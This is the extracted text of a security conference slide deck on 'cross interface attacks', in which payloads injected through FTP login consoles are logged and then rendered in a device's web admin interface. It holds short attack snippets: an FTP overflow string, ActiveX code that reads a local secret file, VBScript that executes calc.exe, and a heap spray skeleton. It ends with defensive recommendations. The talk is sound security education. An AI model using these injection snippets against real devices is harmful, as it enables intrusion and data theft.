![Advanced Code InjectionsHeap Spray code executionvarshellcode = unescape(””);var heap block=unescape(”%u0a0a%u0a0a”);varnop sled= unescape(”%u09090%u09090%u09090”)do {heap_block += heap_block;} while (heap_block.length < xxxx)var memory = new Array();for (ret=0; ret <100; ret++){ memory[ret] += heap_block+nop_sled+shellcode; }](https://image.slidesharecdn.com/crossinterfaceattack-110918130207-phpapp02/85/Cross-interface-attack-21-320.jpg)
Cross interface attack
- 1. CROSS INTERFACE ATTACKPiyush MittalSecurity Compass
- 2. IntroductionWhen 1 interface is used to attack the other interface.
- 3. Different from XSSXSS - Entry point is from web to webCIA - Entry point is from backend login console to web interface
- 4. CIA CharacteristicsExploits the default nature of FTP /Telnet ProtocolAdmin interfaces : { Web, FTP, Telnet}Logging module running as rootDOM and HTML rendered as dynamic contentAttacks are persistent in natureHardware devices – firewalls, disk stations, management systems etc.
- 5. Truth About FTPThe default design of FTP allows the acceptance of both username and password prior to the authentication process and complete verification.No check on no of login attempts. No check on type of characters.
- 6. Old Buffer Trickroot@redux$ ftp example.comConnected to example.com.220 Disk Station FTP server at DiskStation ready.User (example.com:(none)):AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA331 Password required forAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.Password:530 Login incorrect.Login failed.
- 7. Design of the ApplicationFTP LOGININTERFACEI
- 8. Design of the ApplicationFTP LOGININTERFACEInject PayloadI
- 9. Design of the ApplicationFTPAuthenticationModuleFTP LOGININTERFACEInject PayloadI
- 10. Design of the ApplicationFTPAuthenticationModuleFTP LOGININTERFACEFTP Logging ModuleInject PayloadI
- 11. Design of the ApplicationFTPAuthenticationModuleFTP Logging module run as root or administratorFTP LOGININTERFACEFTP Logging ModuleInject PayloadI
- 12. Design of the ApplicationFTPAuthenticationModuleFTP Logging module run as root or administratorFTP LOGININTERFACEFTP Logging ModuleInject PayloadWeb InterfaceI
- 13. Design of the ApplicationFTPAuthenticationModuleFTP Logging module run as root or administratorFTP LOGININTERFACEFTP Logging ModuleUnencoded/Unfiltered HTML renderingInject PayloadWeb InterfaceI
- 14. THREATSInformation Stealing Sample code
- 15. THREATS Cookie Stealing
- 16. THREATSMalware Infections - Executing payloads to conduct Drive by Download Attacks Sample code
- 17. THREATS Drive by Download Attack
- 18. THREATSCSRF Sample codeTuning Network device into attack pot
- 19. Advanced Code InjectionsActive X code executionvarfso = new ActiveXObject(”Scripting.FileSystemObject”);XFile = fso.GetFile(”c:/business/secret.txt”);stream = XFile.OpenAsTextStream(1, 0);var content = stream.ReadAll();
- 20. Advanced Code InjectionsVBScript code execution<object classid=’clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8’ id=’target’ ></object> <script language=’vbscript’>arg1=”c:/WINDOWS/system32/calc.exe”target.Exec arg1</script>
- 21. Advanced Code InjectionsHeap Spray code executionvarshellcode = unescape(””);var heap block=unescape(”%u0a0a%u0a0a”);varnop sled= unescape(”%u09090%u09090%u09090”)do {heap_block += heap_block;} while (heap_block.length < xxxx)var memory = new Array();for (ret=0; ret <100; ret++){ memory[ret] += heap_block+nop_sled+shellcode; }
- 22. Advanced Code InjectionsAJAX code execution
- 23. DEFENSEA whitelist approach should be followed at the protocol level to reduce the impact of exploitation.The error reporting mechanism should be used in conjunction with the FTP authentication module to restrict the acceptance of malicious input through login consoles.The logging process should not run as administrator or root user.The logs should be rendered in a customized format which does not allow DOM and HTML elements to get rendered as dynamic content. The content should be sniffed to avoid the usage of malicious input thereby defining the Content-Type appropriately.
- 24. ???????When In doubt, its better to ask
- 26. THANKS